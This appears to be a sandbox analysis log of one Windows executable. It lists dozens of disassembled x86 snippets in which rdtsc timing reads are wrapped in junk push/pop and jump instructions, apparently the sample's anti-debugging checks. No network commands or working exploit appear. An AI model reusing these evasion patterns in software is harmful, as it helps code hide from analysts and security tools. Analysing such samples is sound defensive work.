Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5F3AD second address: F5F3CD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FA52075DA67h 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007FA52075DA5Fh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5F3CD second address: F5F3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA521013243h 0x0000000b jne 00007FA521013236h 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5F6A3 second address: F5F6A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5F6A7 second address: F5F6BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA521013241h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5F6BE second address: F5F6C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5FC5F second address: F5FC65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5FEEA second address: F5FEEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5FEEE second address: F5FEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F5FEF4 second address: F5FF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 js 00007FA52075DA56h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F6025D second address: F60267 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA52101323Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F60267 second address: F602AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA52075DA5Ch 0x0000000a jng 00007FA52075DA56h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push esi 0x00000013 pushad 0x00000014 jng 00007FA52075DA56h 0x0000001a jbe 00007FA52075DA56h 0x00000020 jmp 00007FA52075DA67h 0x00000025 popad 0x00000026 jl 00007FA52075DA62h 0x0000002c jg 00007FA52075DA56h 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F6051D second address: F60521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F60521 second address: F60544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA52075DA65h 0x0000000b jnp 00007FA52075DA5Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F60544 second address: F60566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA521013245h 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F60566 second address: F60583 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA69h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F60583 second address: F60589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F60589 second address: F60594 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FA52075DA56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F65DDF second address: F65DE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F68E6C second address: F68E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F68E72 second address: F68E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F68E76 second address: F68E91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FA52075DA65h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F69024 second address: F6905E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jc 00007FA521013236h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FA521013247h 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jp 00007FA521013236h 0x0000001c jmp 00007FA52101323Ch 0x00000021 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F6905E second address: F69072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FA52075DA5Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F691A7 second address: F691B7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA521013242h 0x00000008 jg 00007FA521013236h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F691B7 second address: F691CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA52075DA58h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F691CA second address: F691CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F69338 second address: F69366 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA52075DA76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F69366 second address: F6936C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F7494C second address: F74962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA61h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F74962 second address: F74968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F72BDD second address: F72C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA52075DA64h 0x00000009 jmp 00007FA52075DA5Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F72C00 second address: F72C10 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA521013236h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F72C10 second address: F72C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA52075DA5Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F73062 second address: F730A3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA521013236h 0x00000008 jmp 00007FA521013240h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 ja 00007FA521013238h 0x00000017 push eax 0x00000018 jmp 00007FA521013244h 0x0000001d push edx 0x0000001e pop edx 0x0000001f pop eax 0x00000020 pushad 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F730A3 second address: F730A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F731DC second address: F731E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F731E1 second address: F73213 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a je 00007FA52075DA58h 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA52075DA60h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F73213 second address: F7321D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA521013236h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F73357 second address: F733B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FA52075DA66h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jnl 00007FA52075DA56h 0x00000018 push eax 0x00000019 pop eax 0x0000001a jmp 00007FA52075DA67h 0x0000001f popad 0x00000020 jno 00007FA52075DA58h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F733B6 second address: F733CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA521013244h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F733CE second address: F733D8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA52075DA56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F725CC second address: F725DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FA52101323Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F725DC second address: F725E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F725E0 second address: F725EA instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA52101323Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F76D66 second address: F76D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F76D6A second address: F76D8A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA521013236h 0x00000008 jnl 00007FA521013236h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007FA52101323Dh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F76D8A second address: F76D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F7B502 second address: F7B51D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA521013236h 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FA52101323Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F7B51D second address: F7B523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F7B6AC second address: F7B6B2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F7B6B2 second address: F7B6C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FA52075DA56h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F7B6C0 second address: F7B6C6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F87CAE second address: F87CB3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F87CB3 second address: F87CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 jmp 00007FA521013243h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F87CD4 second address: F87CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F8C71D second address: F8C724 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F8EB9C second address: F8EBA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F8EBA2 second address: F8EBAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F8EBAD second address: F8EBB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F8EBB1 second address: F8EBB7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F8EBB7 second address: F8EBBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F8ED6B second address: F8ED6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F8ED6F second address: F8ED75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F8ED75 second address: F8ED7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F8ED7D second address: F8ED81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F8ED81 second address: F8ED85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F8ED85 second address: F8ED8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F90631 second address: F9068A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FA521013243h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FA521013248h 0x00000017 popad 0x00000018 pop edx 0x00000019 jbe 00007FA521013266h 0x0000001f pushad 0x00000020 push esi 0x00000021 pop esi 0x00000022 je 00007FA521013236h 0x00000028 jmp 00007FA52101323Eh 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F9068A second address: F9069A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 ja 00007FA52075DA56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F9758C second address: F975A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52101323Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FA52101323Ch 0x0000000f ja 00007FA521013236h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F975A7 second address: F975BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA52075DA5Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F975BB second address: F975D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA52101323Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FA75D0 second address: FA75D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FA7700 second address: FA7707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FA7707 second address: FA7720 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA52075DA5Eh 0x00000008 pushad 0x00000009 jp 00007FA52075DA56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FA7B70 second address: FA7B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FA8A68 second address: FA8A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FA8A6C second address: FA8AA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA521013247h 0x00000007 jns 00007FA521013236h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 jmp 00007FA52101323Fh 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FAC46C second address: FAC476 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA52075DA56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FAC476 second address: FAC47D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FAC47D second address: FAC4B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA52075DA56h 0x0000000a popad 0x0000000b js 00007FA52075DA6Ch 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 ja 00007FA52075DA58h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FAC4B2 second address: FAC4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FBC78A second address: FBC79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007FA52075DA5Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FBC61A second address: FBC62C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52101323Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FBC62C second address: FBC64A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jbe 00007FA52075DA56h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jc 00007FA52075DA56h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FBC64A second address: FBC650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FCA4B5 second address: FCA4C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FA52075DA56h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FCA4C1 second address: FCA4C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FCA4C5 second address: FCA4CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FE294C second address: FE2957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA521013236h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FE2ABA second address: FE2AFB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA52075DA62h 0x00000008 jnl 00007FA52075DA56h 0x0000000e jno 00007FA52075DA56h 0x00000014 push edx 0x00000015 jmp 00007FA52075DA61h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c pop edx 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FA52075DA5Eh 0x00000026 pushad 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FE2C76 second address: FE2C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FE2C7C second address: FE2C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FA52075DA68h 0x0000000b jmp 00007FA52075DA62h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FE30C1 second address: FE30CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA521013236h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FE3625 second address: FE3632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007FA52075DA56h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
